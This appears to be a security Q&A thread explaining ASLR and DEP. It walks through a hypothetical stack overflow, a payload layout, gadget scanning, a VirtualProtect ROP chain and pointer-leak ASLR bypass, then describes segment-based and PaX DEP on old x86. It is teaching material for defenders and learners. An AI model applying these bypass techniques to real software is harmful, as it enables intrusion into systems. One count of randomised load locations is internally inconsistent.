How do ASLR and DEP work?

Address Space Layout Randomisation (ASLR) is a technology used to help prevent shellcode from being successful. It does this by randomly offsetting the locations of modules and certain in-memory structures. Data Execution Prevention (DEP) prevents certain memory sectors, e.g. the stack, from being executed. When combined, they make it exceedingly difficult to exploit vulnerabilities in applications using shellcode or return-oriented programming (ROP) techniques.

First, let's look at how a normal vulnerability might be exploited. We'll skip all the details, but let's just say we're using a stack buffer overflow vulnerability. We've loaded a big blob of 0x41414141 values into our payload, and eip has been set to 0x41414141, so we know it's exploitable. We've then gone and used an appropriate tool (e.g. Metasploit's pattern_create.rb) to discover the offset of the value being loaded into eip. This is the start offset of our exploit code. To verify, we load 0x41 before this offset, 0x42424242 at the offset, and 0x43 after the offset.
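
To make the setup concrete, the kind of bug we're assuming looks something like the following sketch: a fixed-size stack buffer filled from attacker-controlled input with no length check (the function name and buffer size are invented for illustration):

    #include <string.h>

    /* Hypothetical vulnerable function: a 64-byte stack buffer is filled
     * from attacker-controlled input with no bounds check, so a long
     * enough input overruns the buffer and overwrites the saved return
     * address further up the stack. */
    void parse_request(const char *input)
    {
        char buf[64];
        strcpy(buf, input);   /* no length check - classic stack overflow */
    }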

In a non-ASLR and non-DEP process, the stack address is the same every time we run the process. We know exactly where it is in memory. So, let's see what the stack looks like with the test data we described above:

stack addr | value
-----------+----------
 000ff6a0  | 41414141
 000ff6a4  | 41414141
 000ff6a8  | 41414141
 000ff6ac  | 41414141
>000ff6b0  | 42424242   > esp points here
 000ff6b4  | 43434343
 000ff6b8  | 43434343

As we can see, esp points to 000ff6b0, which has been set to 0x42424242. The values prior to this are 0x41 and the values after are 0x43, as we said they should be. We now know that the address stored at 000ff6b0 will be jumped to. So, we set it to the address of some memory that we can control:

stack addr | value
-----------+----------
 000ff6a0  | 41414141
 000ff6a4  | 41414141
 000ff6a8  | 41414141
 000ff6ac  | 41414141
>000ff6b0  | 000ff6b4
 000ff6b4  | cccccccc
 000ff6b8  | 43434343

We've set the value at 000ff6b0 such that eip will be set to 000ff6b4 - the next offset in the stack. This will cause 0xcc to be executed, which is an int3 instruction. Since int3 is a software interrupt breakpoint, it'll raise an exception and the debugger will halt. This allows us to verify that the exploit was successful.

> Break instruction exception - code 80000003 (first chance)
[snip]
eip=000ff6b4

Now we can replace the memory at 000ff6b4 with shellcode, by altering our payload. This concludes our exploit.
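
To make the payload layout concrete, here's a rough sketch of how it might be assembled. The 16-byte padding is just the distance visible in the stack dumps above; the real offset is whatever the pattern_create.rb step reported, and all addresses are the hypothetical ones used in this walkthrough:

    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
        unsigned char payload[64];
        size_t n = 0;

        /* Filler up to the saved return address (offset found earlier). */
        memset(payload + n, 0x41, 16);
        n += 16;

        /* Overwrite the return address with 000ff6b4, the next stack
         * slot, written little-endian. */
        const unsigned char ret_addr[] = { 0xb4, 0xf6, 0x0f, 0x00 };
        memcpy(payload + n, ret_addr, sizeof(ret_addr));
        n += sizeof(ret_addr);

        /* "Shellcode": four int3 (0xcc) breakpoints for now; replace
         * these bytes with real shellcode later. */
        memset(payload + n, 0xcc, 4);
        n += 4;

        fwrite(payload, 1, n, stdout);   /* feed this to the target */
        return 0;
    }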

In order to prevent these exploits from being successful, Data Execution Prevention was developed. DEP forces certain structures, including the stack, to be marked as non-executable. This is made stronger by CPU support with the No-Execute (NX) bit, also known as the XD bit, EVP bit, or XN bit, which allows the CPU to enforce execution rights at the hardware level. DEP was introduced in Linux in 2004 (kernel 2.6.8), and Microsoft introduced it in 2004 as part of WinXP SP2. Apple added DEP support when they moved to the x86 architecture in 2006. With DEP enabled, our previous exploit won't work:

> Access violation - code c0000005 (!!! second chance !!!)
[snip]
eip=000ff6b4

This fails because the stack is marked as non-executable, and we've tried to execute it. To get around this, a technique called Return-Oriented Programming (ROP) was developed. This involves looking for small snippets of code, called ROP gadgets, in legitimate modules within the process. These gadgets consist of one or more instructions, followed by a return. Chaining these together with appropriate values in the stack allows for code to be executed.
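
For a sense of what these gadgets look like in practice: a pop eax; ret gadget is just the byte sequence 58 c3 sitting somewhere in a module's executable pages. A hypothetical scan for a couple of such patterns might look like this sketch (in a real exploit you'd normally use a dedicated tool, and the module base and size come from wherever you obtained the binary):

    #include <stdio.h>
    #include <string.h>

    /* Hypothetical gadget scan over a module image loaded at module_base. */
    static void find_gadgets(const unsigned char *module_base, size_t module_size)
    {
        static const unsigned char pop_eax_ret[] = { 0x58, 0xc3 };  /* pop eax; ret */
        static const unsigned char pop_ecx_ret[] = { 0x59, 0xc3 };  /* pop ecx; ret */

        for (size_t i = 0; i + 2 <= module_size; i++) {
            if (memcmp(module_base + i, pop_eax_ret, 2) == 0)
                printf("pop eax; ret at offset %#zx\n", i);
            if (memcmp(module_base + i, pop_ecx_ret, 2) == 0)
                printf("pop ecx; ret at offset %#zx\n", i);
        }
    }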

First, let's look at how our stack looks right now:

stack addr | value
-----------+----------
 000ff6a0  | 41414141
 000ff6a4  | 41414141
 000ff6a8  | 41414141
 000ff6ac  | 41414141
>000ff6b0  | 000ff6b4
 000ff6b4  | cccccccc
 000ff6b8  | 43434343

We know that we can't execute the code at 000ff6b4, so we have to find some legitimate code that we can use instead. Imagine that our first task is to get a value into the eax register. We search for a pop eax; ret combination somewhere in any module within the process. Once we've found one, let's say at 00401f60, we put its address into the stack:

stack addr | value
-----------+----------
 000ff6a0  | 41414141
 000ff6a4  | 41414141
 000ff6a8  | 41414141
 000ff6ac  | 41414141
>000ff6b0  | 00401f60
 000ff6b4  | cccccccc
 000ff6b8  | 43434343

When this runs, we'll get an access violation again:

> Access violation - code c0000005 (!!! second chance !!!)
eax=cccccccc ebx=01020304 ecx=7abcdef0 edx=00000000 esi=7777f000 edi=0000f0f1
eip=43434343 esp=000ff6bc ebp=000ff6ff

The CPU has now done the following:

  • Jumped to the pop eax instruction at 00401f60.
  • Popped cccccccc off the stack, into eax.
  • Executed the ret, popping 43434343 into eip.
  • Thrown an access violation because 43434343 isn't a valid memory address.

Now, imagine that, instead of 43434343, the value at 000ff6b8 was set to the address of another ROP gadget. This would mean that pop eax gets executed, then our next gadget. We can chain gadgets together like this. Our ultimate goal is usually to find the address of a memory protection API, such as VirtualProtect, and mark the stack as executable. We'd then include a final ROP gadget to do a jmp esp equivalent instruction, and execute shellcode. We've successfully bypassed DEP!
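
As a rough sketch of what such a finished chain looks like laid out on the stack (every address below is a made-up placeholder), one common variant is to "return into" VirtualProtect with its stdcall arguments already on the stack, so that it marks the page holding our shellcode executable and then returns straight into it; the jmp esp approach mentioned above works similarly, with the gadget's address in the return-address slot:

    #include <stdint.h>

    /* Hypothetical ROP chain, as the 32-bit values we'd place on the stack. */
    uint32_t rop_chain[] = {
        0x7c801ad4,  /* address of VirtualProtect (placeholder)              */
        0x000ff6d0,  /* return address: where our shellcode lives            */
        0x000ff6d0,  /* lpAddress      - page containing the shellcode       */
        0x00000100,  /* dwSize         - bytes to make executable            */
        0x00000040,  /* flNewProtect   - PAGE_EXECUTE_READWRITE              */
        0x000ff690,  /* lpflOldProtect - any writable scratch address        */
        /* ... shellcode sits at 0x000ff6d0 ... */
    };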

In order to combat these tricks, ASLR was developed. ASLR involves randomly offsetting memory structures and module base addresses to make guessing the location of ROP gadgets and APIs very difficult.

On Windows Vista and 7, ASLR randomises the location of executables and DLLs in memory, as well as the stack and heaps. When an executable is loaded into memory, Windows gets the processor's timestamp counter (TSC), shifts it by four places, performs division mod 254, then adds 1. This number is then multiplied by 64KB, and the executable image is loaded at this offset. This means that there are 256 possible locations for the executable. Since DLLs are shared in memory across processes, their offsets are determined by a system-wide bias value that is computed at boot. The value is computed as the TSC of the CPU when the MiInitializeRelocations function is first called, shifted and masked into an 8-bit value. This value is computed only once per boot.

When DLLs are loaded, they go into a shared memory region between 0x50000000 and 0x78000000. The first DLL to be loaded is always ntdll.dll, which is loaded at 0x78000000 - bias * 0x100000, where bias is the system-wide bias value computed at boot. Since it would be trivial to compute the offset of a module if you know ntdll.dll's base address, the order in which modules are loaded is randomised too.
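
To make the arithmetic above concrete, here's a small sketch of both calculations with a made-up TSC value; the exact shift and mask used to derive the bias aren't spelled out here, so they're shown as plausible guesses:

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        uint64_t tsc = 0x0123456789abcdefULL;       /* made-up timestamp counter */

        /* Executable image: shift by four, mod 254, plus 1, times 64KB. */
        uint32_t exe_slot   = (uint32_t)((tsc >> 4) % 254) + 1;
        uint32_t exe_offset = exe_slot * 0x10000;

        /* System-wide DLL bias: an 8-bit TSC-derived value computed once at
         * boot (the shift/mask here is a guess); ntdll.dll then loads at
         * 0x78000000 - bias * 0x100000. */
        uint32_t bias       = (uint32_t)(tsc >> 4) & 0xff;
        uint32_t ntdll_base = 0x78000000u - bias * 0x100000u;

        printf("image offset %#x, ntdll base %#x\n",
               (unsigned)exe_offset, (unsigned)ntdll_base);
        return 0;
    }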

When threads are created, their stack base location is randomised. This is done by finding 32 appropriate locations in memory, then choosing one based on the current TSC shifted and masked into a 5-bit value. Once the base address has been calculated, another 9-bit value is derived from the TSC to compute the final stack base address. This provides a high theoretical degree of randomness.

Finally, the locations of heaps and heap allocations are randomised. This is computed as a 5-bit TSC-derived value multiplied by 64KB, giving a possible heap range of 00000000 to 001f0000.

When all of these mechanisms are combined with DEP, we are prevented from executing shellcode. This is because we cannot execute the stack, but we also don't know where any of our ROP instructions are going to be in memory. Certain tricks can be done with nop sleds to create a probabilistic exploit, but they are not entirely reliable and aren't always possible to create.

The only way to reliably bypass DEP and ASLR is through a pointer leak. This is a situation where a value on the stack, at a reliable location, might be used to locate a usable function pointer or ROP gadget. Once this is done, it is sometimes possible to create a payload that reliably bypasses both protection mechanisms.
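
A sketch of the arithmetic involved, assuming we've leaked a pointer into a module we also have a copy of (all offsets below are invented):

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        /* Hypothetical info leak: a value read off the stack points at a
         * function which, from a local copy of the DLL, we know sits at
         * offset 0x1a2b0 from the module base. */
        uint32_t leaked_ptr     = 0x6b25a2b0;   /* obtained at runtime    */
        uint32_t known_offset   = 0x0001a2b0;   /* from static analysis   */
        uint32_t module_base    = leaked_ptr - known_offset;

        /* Once the randomised base is known, every gadget and API in the
         * module can be rebased the same way. */
        uint32_t pop_eax_gadget = module_base + 0x00003f60;

        printf("module base %#x, gadget at %#x\n",
               (unsigned)module_base, (unsigned)pop_eax_gadget);
        return 0;
    }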

Sources:

  • Windows Internals 5th Edition - Mark Russinovich
  • An Analysis of ASLR in Windows Vista - Symantec
  • ASLR on Wikipedia
  • DEP on Wikipedia

Further reading:

  • Stack-based exploit writing - CoreLAN
  • Bypassing stack cookies, SafeSEH, SEHOP, HW DEP and ASLR - CoreLAN
  • Bypassing ASLR/DEP - exploit-db

To complement @Polynomial's self-answer: DEP can actually be enforced on older x86 machines (which predate the NX bit), but at a price.

The easy but limited way to do DEP on old x86 hardware is to use segment registers. With current operating systems on such systems, addresses are 32-bit values in a flat 4 GB address space, but internally each memory access implicitly uses a 32-bit address and a special 16-bit register, called a "segment register".

In so-called protected mode, segment registers point to an internal table (the "descriptor table" -- actually there are two such tables, but that's a technicality) and each entry in the table specifies the characteristics of the segment: in particular, the types of allowed accesses, and the size of the segment. Moreover, code execution implicitly uses the CS segment register, while data access mostly uses DS (and stack access, e.g. with the push and pop opcodes, uses SS). This allows the operating system to split the address space into two parts: the lower addresses are in range for both CS and DS, while the upper addresses are out of range for CS. For instance, the segment described by CS is made to be 512 MB in size. This means that any address beyond 0x20000000 will be accessible as data (read or written using DS as the base register), but execution attempts will use CS, at which point the CPU will raise an exception (which the kernel will convert into a suitable signal like SIGILL or SIGSEGV, usually implying the death of the offending process).
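
To make that concrete, a user-mode code segment descriptor with base 0 and a 512 MB limit would look roughly like the sketch below; the field layout is the standard x86 descriptor format, and the particular values are only illustrative of the scheme, not of any specific kernel:

    #include <stdint.h>

    /* Standard x86 (GDT) segment descriptor layout. */
    struct gdt_descriptor {
        uint16_t limit_low;       /* limit bits 15:0                         */
        uint16_t base_low;        /* base bits 15:0                          */
        uint8_t  base_mid;        /* base bits 23:16                         */
        uint8_t  access;          /* present, DPL, code/data type            */
        uint8_t  flags_limit_hi;  /* granularity, 32-bit flag, limit 19:16   */
        uint8_t  base_high;       /* base bits 31:24                         */
    };

    /* Code segment: base 0, limit 0x1ffff pages of 4 KB = 512 MB, so only
     * addresses below 0x20000000 can be executed through CS. */
    static const struct gdt_descriptor user_cs_512mb = {
        .limit_low      = 0xffff,
        .base_low       = 0x0000,
        .base_mid       = 0x00,
        .access         = 0xfa,   /* present, ring 3, executable, readable  */
        .flags_limit_hi = 0xc1,   /* 4 KB granularity, 32-bit, limit 19:16  */
        .base_high      = 0x00,
    };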

(Note that segments are applied on address space; the MMU is still active, on a lower layer, so the trick explained above is per-process.)

This is cheap to do: the x86 hardware does enforce segments, systematically (and the first 80386 was already doing it; actually, the 80286 already had such segments with boundaries, but only 16-bit offsets). We can usually forget them because sane operating systems set the segments to begin at offset zero and be 4 GB long, but setting them otherwise does not imply any overhead which we did not already have. However, as a DEP mechanism, it is inflexible: when some data block is requested from the kernel, the kernel must decide whether it is for code or not, because the boundary is fixed. We cannot decide to dynamically convert any given page between code-mode and data-mode.

The fun but somewhat more expensive way to do DEP uses something called PaX. To understand what it does, one must go into some details.

The MMU on x86 hardware uses in-memory tables, which describe the status of every 4 kB page in the address space. The address space is 4 GB, so there are 1048576 pages. Each page is described by a 32-bit entry in a sub-table; there are 1024 sub-tables, each holding 1024 entries, and there is one main table, with 1024 entries which point to the 1024 sub-tables. Each entry tells where the pointed-to object (a sub-table, or a page) is in RAM, or whether it is there at all, and what its access rights are. The root of the issue is that the access rights consist of a privilege level (kernel code vs userland) and only one bit for the access type, thus allowing "read-write" or "read-only". "Execution" is considered to be a kind of read access. Hence, the MMU has no notion of "execution" being distinct from data access. That which is readable, is executable.
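
Concretely, a 32-bit virtual address is split into three fields under this (non-PAE) scheme; a small sketch:

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        uint32_t vaddr = 0x000ff6b4;                   /* any virtual address */

        uint32_t dir_index   = vaddr >> 22;            /* entry in the main table
                                                          (the page directory)  */
        uint32_t table_index = (vaddr >> 12) & 0x3ff;  /* entry in that sub-table
                                                          (the page table)      */
        uint32_t page_offset = vaddr & 0xfff;          /* offset in the 4 kB page */

        printf("directory %u, table %u, offset %#x\n",
               (unsigned)dir_index, (unsigned)table_index, (unsigned)page_offset);
        return 0;
    }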

(Since the Pentium Pro, back in the previous century, x86 processors have known another format for the tables, called PAE. It doubles the size of entries, which leaves room for addressing more physical RAM and also for an NX bit -- but that specific bit was implemented by the hardware only around 2004.)

However, there is a trick. RAM is slow. To perform a memory access, the processor must first read the main table to locate the sub-table that it must consult, then do another read to that sub-table, and only at that point does the processor know whether the memory access should be allowed or not, and where in physical RAM the accessed data really is. These are read accesses with full dependency (each access depends on the value read by the previous), so this pays the full latency, which, on a modern CPU, can represent hundreds of clock cycles. Therefore, the CPU includes a specific cache which contains the most recently accessed MMU table entries. This cache is the Translation Lookaside Buffer (TLB).

From the 80486 onwards, x86 CPUs do not have one TLB, but two. Caching works on heuristics, and heuristics depend on access patterns, and access patterns for code tend to differ from access patterns for data. So the smart people at Intel/AMD/other found it worthwhile to have a TLB dedicated to code access (execution), and another for data access. Moreover, the 80486 has an opcode (invlpg) which can remove a specific entry from the TLB.

So the idea is the following: make the two TLB have different views of the same entry. All pages are marked in the tables (in RAM) as "absent", thus triggering an exception upon access. The kernel traps the exception, and the exception includes some data about the type of access, in particular whether it was for code execution, or not. The kernel then invalidates the newly read TLB entry (the one which says "absent"), then fills the entry in RAM with some rights which allow access, then forces one access of the needed type (either data read or code execution), which feeds the entry into the corresponding TLB, and only that one. The kernel then promptly sets the entry in RAM back to absent, and finally returns to the process (back to trying again the opcode which triggered the exception).

The net effect is that, when the execution comes back to the process code, the TLB for code or the TLB for data contains the appropriate entry, but the other TLB does not, and will not since the tables in RAM still say "absent". At that point, the kernel is in position to decide whether to allow execution or not, independently from whether it allows data access or not. It can thus enforce NX-like semantics.
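
In rough pseudocode, the page-fault handler implementing this trick (PaX's PAGEEXEC, heavily simplified; every helper name below is invented, and the real code has to deal with SMP, races and many corner cases) behaves like this:

    /* Very rough sketch of the PAGEEXEC idea -- not real PaX code. */
    void page_fault_handler(struct page *page, int is_instruction_fetch)
    {
        if (is_instruction_fetch && !page_marked_executable(page)) {
            /* Execution attempted on a data-only page: NX-like violation. */
            send_sigsegv_to_current_process();
            return;
        }

        invalidate_tlb_entry(page->vaddr);  /* drop the stale "absent" entry   */
        set_pte_present(page);              /* temporarily mark page present   */

        if (is_instruction_fetch)
            touch_as_code(page);            /* primes the code (execution) TLB */
        else
            touch_as_data(page);            /* primes the data TLB             */

        set_pte_absent(page);               /* RAM tables say "absent" again   */

        /* Return to the process: the faulting instruction is retried and now
         * hits the freshly primed TLB entry without consulting the tables.   */
    }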

The Devil hides in the details; in this case, there is room for a whole legion of demons. Such a dance with the hardware is not easy to implement properly. Especially on multi-core systems.

The overhead is the following: when an access is performed and the TLB does not contain the relevant entry, the tables in RAM must be accessed, and that alone implies losing a few hundred cycles. To that cost, PaX adds the overhead of the exception, and the management code which fills the right TLB, thus turning the "a few hundred cycles" into "a few thousand cycles". Fortunately, TLB misses are rare. The PaX people claim to have measured a slowdown of as little as 2.7% on a big compilation job (this depends on the CPU type, though).

The NX bit makes all of this obsolete. Note that the PaX patchset also contains some other security-related features, such as ASLR, which is redundant with some functionality of newer official kernels.